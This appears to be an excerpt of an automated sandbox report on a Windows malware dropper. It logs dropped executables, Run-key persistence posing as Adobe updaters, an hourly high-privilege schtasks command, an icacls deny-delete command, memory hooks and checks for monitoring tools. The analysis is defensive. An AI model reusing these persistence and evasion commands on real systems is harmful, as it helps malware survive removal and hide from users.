                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\openh264.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\is-HB2OO.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\Qt5OpenGL.dll (copy)Jump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exeJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeJump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile created: C:\ProgramData\MPGPH131\MPGPH131.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\is-5LVFF.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\Qt5Xml.dll (copy)Jump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\FIxDICT7hSLYFeTzbHHqKZ7Z.exeJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\o2i3jroi23joj23ikrjokij3oroi[1].exeJump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\setup[1].exeJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeJump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\J9jGBSSbDD3yrTx79DzmOLls.exeJump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\is-JVAO2.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\msvcp140_1.dll (copy)Jump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\is-CKPLA.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\turquoisecdplayer.exeJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\ogoGQsWFwF_EcodN5qF7hiVC.exeJump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\g_XGqx6vQcj4WvdQ2CmFiUpM.exeFile created: C:\Users\user\AppData\Local\Temp\7zSFB35.tmp\Install.exeJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\Default15_s[1].exeJump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\A_22rjVO67ooiUk2ueyL6tMl.exeFile created: C:\Users\user\AppData\Local\Temp\Protect544cd51a.dllJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\_rSi8sV87ppx0bgkbETdFbEZ.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\msvcp140.dll (copy)Jump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\sqls[1].dllJump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Turquoise CD Player\turquoisecdplayer.exeFile created: C:\ProgramData\JANA timezone 2.12.66\JANA timezone 2.12.66.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\is-9ULQD.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\niko[1].exeJump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeFile created: C:\Users\user\AppData\Local\cd606818-a84b-463e-828b-b93214ba547c\7U1bGcxK3Lqi_XMHDNEdJrhB.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\msvcp120.dll (copy)Jump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\setup294[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-MGI15.tmp\_isetup\_RegDLL.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\is-FS8TN.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\libmp3lame.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\is-F6JQ6.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\is-46IH9.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\avdevice-58.dll (copy)Jump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\_ebPmq_TcwNignYm0bf0ytJM.exeJump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\is-U2S42.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\unins000.exe (copy)Jump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\_rSi8sV87ppx0bgkbETdFbEZ.exeFile created: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpJump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\crt[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\is-99KJO.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\7zSFB35.tmp\Install.exeFile created: C:\Users\user\AppData\Local\Temp\7zSD75.tmp\Install.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\is-2FJL8.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\default_s[1].exeJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\ZMyjNtrJZsXoQ4xLeKYzrWJD.exeJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\oiii[1].exeJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exeJump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dllJump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\is-3LABF.tmpJump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exeFile created: C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-MGI15.tmp\_isetup\_setup64.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-MGI15.tmp\_isetup\_isdecmp.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-MGI15.tmp\_isetup\_iscrypt.dllJump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeFile created: C:\Users\user\AppData\Local\Temp\eKhLlZQ.cplJump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\zfQlIB6J8n2u_zLV5LHnA1xW.exeFile created: C:\Users\user\AppData\Local\Temp\kat806.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\Retailer_prog[1].exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\is-JE3T2.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\is-BEO98.tmpJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\libeay32.dll (copy)Jump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\timeSync[1].exeJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-MGI15.tmp\_isetup\_shfoldr.dllJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\mousehelper.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\Qt5WinExtras.dll (copy)Jump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\Qt5Svg.dll (copy)Jump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\is-KE107.tmp\_rSi8sV87ppx0bgkbETdFbEZ.tmpFile created: C:\Users\user\AppData\Local\Turquoise CD Player\is-KQVQS.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeFile created: C:\Users\user\Documents\SimpleAdobe\g_XGqx6vQcj4WvdQ2CmFiUpM.exeJump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeFile created: C:\ProgramData\MPGPH131\MPGPH131.exeJump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                      Source: C:\Users\user\AppData\Local\Turquoise CD Player\turquoisecdplayer.exeFile created: C:\ProgramData\JANA timezone 2.12.66\JANA timezone 2.12.66.exeJump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exeFile created: C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exeJump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\EEmC0rfrxeQDEUW4Qmh7BQX4.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                      Source: C:\Users\user\Documents\SimpleAdobe\MYZqYdU5cUVwEz2j0JYbnTar.exeFile created: C:\Users\user\AppData\Local\Temp\eKhLlZQ.cplJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV168_bdca866007fb255201297d2a15a49513
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeWindow searched: window name: RegmonClassJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeWindow searched: window name: RegmonClassJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeWindow searched: window name: RegmonClass
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeWindow searched: window name: FilemonClass
                      Source: C:\Users\user\Documents\SimpleAdobe\0YXJTGaxIrryNdvx7SKozTjt.exeWindow searched: window name: PROCMON_WINDOW_CLASS
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRulesJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV168_bdca866007fb255201297d2a15a49513
                      Source: C:\Users\user\Documents\SimpleAdobe\Zy329tNpRVznAcNUeSg4uGuQ.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV168_bdca866007fb255201297d2a15a49513
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131
                      Source: C:\Users\user\Documents\SimpleAdobe\EPA5EhRzK9ZnpAjdUqLJteUs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RageMP131
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exeMemory written: PID: 5372 base: 7FF8C8A50008 value: E9 EB D9 E9 FF
                      Source: C:\Users\user\Documents\SimpleAdobe\RPA18tS89oJgBrOTDKzODMll.exeMemory written: PID: 5372 base: 7FF8C88ED9F0 value: E9 20 26 16 00
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeCode function: 7_2_004039C9 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_004039C9
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\7U1bGcxK3Lqi_XMHDNEdJrhB.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\cd606818-a84b-463e-828b-b93214ba547c" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                      Source: C:\Users\user\Desktop\CHA0VZiz8y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Documents\SimpleAdobe\xS7PhKcNZTx4FuBAD1RB9kbJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
